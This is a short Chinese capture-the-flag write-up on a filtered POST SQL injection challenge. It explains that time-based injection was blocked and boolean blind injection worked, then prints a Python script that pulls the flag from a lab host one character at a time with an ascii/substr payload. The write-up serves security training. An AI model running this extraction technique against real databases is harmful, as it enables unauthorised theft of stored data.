• 知識點
  基於布林型盲注
  編寫python指令碼能力

• 審題
  
  很簡潔的一個post提交sql注入題 測試了一下 過濾了一大堆 嘗試了基於時間的布林盲注 被過濾 然後嘗試了一下基於布林型的盲注 成功
  然後就是很簡單的編寫指令碼 算是個簡單題
  
  這個就是成功回顯頁面 可以看到和輸入id=1回顯一樣 下面貼出指令碼

import requests
url = 'http://3c029064-6b6f-4efb-b2e0-ebb2495ed95a.node3.buuoj.cn/index.php'
result = ''
num = 0
for i in range (1,60):
    if (num == 1):
        break;
    for j in range (32,128):
        payload = 'if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)'%(i,j)
        print(payload)
        data = {
            'id' : payload,
        }
        r = requests.post(url , data = data)
        if '}' in r.text:
            num = 1
            print(result

                  )
            break
        if 'Hello' in r.text:
            x = chr(j)
            result += str(x)
            print(result)
            break

 

EOF